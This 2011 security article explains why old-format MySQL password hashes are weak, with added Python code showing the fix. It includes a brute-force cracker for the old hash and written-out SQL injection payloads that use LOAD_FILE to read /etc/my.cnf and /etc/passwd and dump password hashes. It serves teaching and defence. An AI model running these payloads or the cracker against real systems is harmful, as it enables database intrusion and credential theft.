Old MySQL Passwords – Insecure and Easy to Crack
23/06/2011
In MySQL 4.1 the algorithm used to hash the passwords stored in the mysql.user table was replaced, as a result of security concerns with the MySQL 3.23 scheme. Despite this, many database installations are still explicitly configured to store passwords in the old format.
With the old format a hash of 16 hexadecimal characters (8 bytes) is produced, such as:
6f8c114b58f2ce9e
For the same password the MySQL 4.1 hash is 41 characters long: an asterisk followed by 40 hexadecimal characters (a 20-byte SHA-1 digest):
*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4
On the surface the extra security granted by the new format might not seem significant. However, source code has been released under a Creative Commons licence that allows very quick cracking of old-format MySQL passwords.
The password 'a@4~1b' has the old-format hash 2c28061c5bda971d.
Using the cracking program mentioned above, this password can be recovered in under 1 second on a 2 year old laptop.
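As an added example (not code from the original post, nor from the cracking program it refers to), the following Python reimplements both hash formats and a plain brute-force search against the old one. The two hashes quoted above are the MySQL manual's examples for the password 'mypass', and the article's hash of 'a@4~1b' is reproduced as well; the 3-character password and the small charset used in the brute-force demo are constructed for illustration.

```python
import hashlib
import itertools
import string

MASK32 = 0xFFFFFFFF
ALNUM = string.ascii_lowercase + string.digits  # constructed demo charset


def old_password(password: str) -> str:
    """Pre-4.1 hash, the same function as MySQL's OLD_PASSWORD().

    Two 32-bit accumulators are mixed byte by byte; spaces and tabs are
    skipped, as the server does. Each accumulator is masked to 31 bits and
    printed as 8 hex digits, which is where the 16-character string comes from.
    """
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for ch in password.encode("utf-8"):
        if ch in (0x20, 0x09):
            continue
        nr = (nr ^ ((((nr & 63) + add) * ch) + (nr << 8))) & MASK32
        nr2 = (nr2 + ((nr2 << 8) ^ nr)) & MASK32
        add += ch
    return "%08x%08x" % (nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF)


def new_password(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' followed by SHA1(SHA1(password)) in upper-case hex."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def brute_force_old(target_hash: str, charset: str, max_len: int):
    """Exhaustive search for a password whose OLD_PASSWORD() hash equals target_hash.

    Returns the first match, or None if nothing up to max_len matches. No
    wordlist or rainbow table is involved: the hash is cheap enough that trying
    every candidate is the whole attack.
    """
    target_hash = target_hash.lower()
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            candidate = "".join(combo)
            if old_password(candidate) == target_hash:
                return candidate
    return None


def keyspace(charset_size: int, max_len: int) -> int:
    """Worst-case number of candidates for passwords of 1..max_len characters."""
    return sum(charset_size ** n for n in range(1, max_len + 1))


if __name__ == "__main__":
    # The two hashes quoted in the article are the MySQL manual's examples for 'mypass'.
    print(old_password("mypass"), new_password("mypass"))
    print(old_password("a@4~1b"))  # the article's 2c28061c5bda971d
    # Recover a short constructed password from its old-format hash.
    print(brute_force_old(old_password("k7q"), ALNUM, 3))
    # Growth of the search space: 6 alphanumerics vs. 12 characters from 95 printables.
    print(keyspace(36, 6), keyspace(95, 12))
```

The search loop is the naive version of what the cracking program does; a compiled implementation is several orders of magnitude faster, which is why a 6-character password with symbols falls in about a second. The keyspace() figures show why the advice at the end of the article (12+ characters, mixed classes) matters: the search space, not the hash, is the only thing slowing the attacker down.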
Through a SQL injection attack it may be possible for a user who has no permission to view your my.cnf file to read it anyway, via MySQL's LOAD_FILE() (this requires that the database account used by the application holds the FILE privilege and that the file is readable by the mysqld user). Entering the following in a search box could render the contents of the file in the browser, if the second column of the SELECT statement is shown on the screen and is not escaped correctly:
something' UNION ALL SELECT 1,(SELECT LOAD_FILE('/etc/my.cnf')),3,4,5,password FROM user ORDER BY '7
In a sample attack this returned the following information:
[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
user=mysql
# Default to using old password format for compatibility with mysql 3.x
# clients (those using the mysqlclient10 compatibility package).
old_passwords=1
This tells the attacker that any MySQL password hashes obtained from this server can be cracked by plain brute force; the old hash is so cheap to compute that more elaborate techniques such as rainbow tables or dictionary attacks are not even needed.
A SQL injection similar to the one above could then be used to obtain the hashes themselves, from the password column of the user table (this query also pulls /etc/passwd):
something' UNION ALL SELECT 1,(SELECT LOAD_FILE('/etc/passwd')),3,4,5,password FROM user ORDER BY '7
While the hashes are being cracked, the other information required, such as the name of the database, can be obtained in the same way:
something' UNION ALL SELECT 1,(SELECT database()),3,4,5,password FROM user ORDER BY '3
Once the attacker is in possession of all of this information, they have complete control over the database on that host.
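As an added example (not code from the original post), here is the same UNION injection run against a small in-memory SQLite database that stands in for the vulnerable application's MySQL backend: a constructed products table, a user table holding the two hashes quoted in this article, and a Python stand-in for LOAD_FILE() that reads from a constructed in-memory file map rather than the real /etc. The payload tail is written as WHERE 'x'='x instead of the article's ORDER BY '7 so that it parses under SQLite as well as MySQL. search_safe shows the fix (bound parameters), and uses_old_passwords() checks the leaked my.cnf for the setting the attacker is looking for.

```python
import sqlite3

# Constructed stand-ins for the server's filesystem and the mysql.user table.
# The hashes are the ones quoted in this article, not live credentials.
FAKE_FILES = {
    "/etc/my.cnf": (
        "[mysqld]\n"
        "datadir=/var/lib/mysql\n"
        "socket=/var/lib/mysql/mysql.sock\n"
        "user=mysql\n"
        "# Default to using old password format for compatibility with mysql 3.x\n"
        "# clients (those using the mysqlclient10 compatibility package).\n"
        "old_passwords=1\n"
    ),
}
USERS = [("root", "6f8c114b58f2ce9e"), ("app", "2c28061c5bda971d")]
PRODUCTS = [
    (1, "widget", "A widget", 9.99, 10, "W-1"),
    (2, "gadget", "A gadget", 19.99, 3, "G-2"),
]

# The article's payload. The application appends its own closing quote, so
# the tail becomes WHERE 'x'='x' (the article uses ORDER BY '7 for the same
# purpose; this form parses under SQLite as well as MySQL).
PAYLOAD = (
    "something' UNION ALL SELECT 1,(SELECT LOAD_FILE('/etc/my.cnf')),3,4,5,password "
    "FROM user WHERE 'x'='x"
)


def load_file(path):
    """Stand-in for MySQL's LOAD_FILE(): file text, or NULL if unreadable."""
    return FAKE_FILES.get(path)


def make_db():
    """In-memory database shaped like the vulnerable application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("LOAD_FILE", 1, load_file)
    conn.execute("CREATE TABLE products(id, name, description, price, stock, sku)")
    conn.executemany("INSERT INTO products VALUES (?,?,?,?,?,?)", PRODUCTS)
    conn.execute("CREATE TABLE user(user, password)")
    conn.executemany("INSERT INTO user VALUES (?,?)", USERS)
    return conn


def search_vulnerable(conn, term):
    """The bug: the search term is spliced into the SQL text, so a quote in
    `term` closes the literal and everything after it is parsed as SQL."""
    sql = ("SELECT id, name, description, price, stock, sku FROM products "
           "WHERE name = '%s'" % term)
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """The fix: a bound parameter is always data, never SQL."""
    sql = ("SELECT id, name, description, price, stock, sku FROM products "
           "WHERE name = ?")
    return conn.execute(sql, (term,)).fetchall()


def uses_old_passwords(my_cnf_text):
    """Read a leaked my.cnf: is old_passwords enabled in the [mysqld] section?"""
    section = None
    for raw in my_cnf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "mysqld":
            continue
        key, _, value = (s.strip() for s in line.partition("="))
        if key.lower() == "old_passwords":
            # A bare "old_passwords" line (no value) also enables the option.
            return value == "" or value.lower() in ("1", "on", "true")
    return False


if __name__ == "__main__":
    conn = make_db()
    for row in search_vulnerable(conn, PAYLOAD):
        # row[1] is the leaked my.cnf text, row[5] the password hash
        print(row[5], "old format" if uses_old_passwords(row[1]) else "new format")
    print(search_safe(conn, PAYLOAD))  # the payload is just a product name here
```

The vulnerable query returns one row per account in the user table, each carrying the my.cnf contents in the second column and the hash in the sixth, exactly the two pieces of information the article describes obtaining. The parameterised version returns nothing for the same input because the payload never reaches the SQL parser as code.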
The advice is not to use old-format MySQL passwords unless absolutely necessary. If you really do need the old format, there are a few rules you can follow to massively increase the time taken to brute force your password. Ensure your password:
- Is at least 12 characters long
- Contains a mix of character classes, including symbols
- Is not made up of words found in a dictionary